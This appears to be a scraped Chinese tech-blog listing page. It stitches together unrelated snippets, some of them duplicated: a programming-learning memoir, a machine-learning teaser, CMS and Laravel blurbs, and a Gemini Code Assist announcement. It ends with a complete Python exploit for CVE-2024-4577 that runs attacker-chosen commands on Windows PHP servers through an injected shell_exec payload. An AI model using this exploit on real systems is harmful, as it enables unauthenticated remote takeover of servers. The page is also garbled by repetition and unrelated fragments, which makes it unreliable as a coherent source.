以下是我的学习编程的经历,希望对初学者一些经验和教训,少走一些弯路,那么意义就达到了。
在大一下学期,我受知乎文化的影响,开始自学C语言,用的是传说中久负盛名的The C programming language,学到20页左右,死活看不懂,把书扔了。
过了一个月,开始上学校的选修课,上C++,老师上课默认大家学过C,以极快的速度照着ppt念,听不懂,开始进入C++苦逼的自学中。学得很努力,很长一段时间都在抱着一本清华大学出版的蓝皮C++书看,一遍又一遍硬头皮读下去。
2025年05月04日
以下是我的学习编程的经历,希望对初学者一些经验和教训,少走一些弯路,那么意义就达到了。
在大一下学期,我受知乎文化的影响,开始自学C语言,用的是传说中久负盛名的The C programming language,学到20页左右,死活看不懂,把书扔了。
过了一个月,开始上学校的选修课,上C++,老师上课默认大家学过C,以极快的速度照着ppt念,听不懂,开始进入C++苦逼的自学中。学得很努力,很长一段时间都在抱着一本清华大学出版的蓝皮C++书看,一遍又一遍硬头皮读下去。
2025年05月04日
本文详细介绍了机器学习的七个核心步骤,从数据收集到模型预测,为初学者提供了一条清晰的学习路径,帮助他们理解并掌握机器学习项目从开始到完成的全过程。
近两年来 AI 产业已然成为新的焦点和风口,各互联网巨头都在布局人工智能,不少互联网产品经理也开始考虑转型 AI 产品经理,入门AI产品经理,或许你应该了解一些相关技术,本文将为你介绍机器学习的7个步骤
2025年05月04日
https://github.com/deepseek-ai/DeepSeek-V3
其实大家可以看看其它作者都用啥工具(语言就是一个工具)大家能看到很多RUST,C,C++,GO,TS,PHP....
2025年05月04日
YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、实用,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。
2025年05月04日
今天,Google宣布Gemini Code Assist Enterprise 将为企业软件开发人员提供企业级人工智能辅助。 利用 Gemini 的大型上下文窗口,开发人员可以根据对本地代码库的深入了解获得更多相关响应。 Google还允许企业根据内部最佳实践和内部库定制 Gemini Code Assist。
Gemini Code Assist 提供人工智能编码辅助功能,帮助软件开发人员在整个软件开发生命周期内构建、部署和运行应用程序。 Gemini Code Assist 可在 VS Code 和 JetBrains IDE 等流行的集成开发环境中使用。启用后,开发人员可以获得代码补全、从注释中生成完整的函数或代码块、创建单元测试等。 Gemini Code Assist 的最大优点是它能根据开发人员的提示提供上下文化的响应。
2025年05月04日
Laravel 被称为简洁、优雅的PHP开发框架,但第一次接触此框架的人有不少都卡在了安装上,其实在 Linux 下只需要很简单的几步就可以搞定,这里我们以 CentOS 下 PHP + Nginx + Mysql 的环境为例。
首先需要了解 Laravel 安装依赖,比如 Laravel4.2 就有下面的要求: PHP >= 5.4 - MCrypt PHP 扩展
最主要的是 PHP 版本,正常安装的话相关扩展应该都会包含
2025年05月04日
用最近使用PhpStorm的激活码到期了,就琢磨着换一个编辑器。vscode评价挺好的而且轻量级免费开源,所以决定vscode开发PHP。
2025年05月04日
直接上代码:
# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.php.net/downloads.php
# Version: PHP 8.3,* < 8.3.8, 8.2.*<8.2.20, 8.1.*, 8.1.29
# CVE : CVE-2024-4577
from requests import Request, Session
import sys
import json
def title():
print('''
_______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______
/ ____\ \ / / ____| |__ \ / _ \__ \| || | | || | | ____|____ |____ |
| | \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ / / / /
| | \ \/ / | __|______/ /| | | |/ /|__ _|______|__ _|___ \ / / / /
| |____ \ / | |____ / /_| |_| / /_ | | | | ___) | / / / /
\_____| \/ |______| |____|\___/____| |_| |_| |____/ /_/ /_/
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py
''')
def exploit(url, command):
payloads = {
'<?php echo "vulnerable"; ?>',
'<?php echo shell_exec("'+command+'"); ?>'
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
'Content-Type': 'application/x-www-form-urlencoded'}
s = Session()
for payload in payloads:
url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
req = Request('POST', url, data=payload, headers=headers)
prepped = req.prepare()
del prepped.headers['Content-Type']
resp = s.send(prepped,
verify=False,
timeout=15)
#print(prepped.headers)
#print(url)
#print(resp.headers)
#print(payload)
print(resp.status_code)
print(resp.text)
if __name__ == '__main__':
title()
if(len(sys.argv) < 2):
print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))
print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))
exit(0)
else:
exploit(sys.argv[1],sys.argv[2])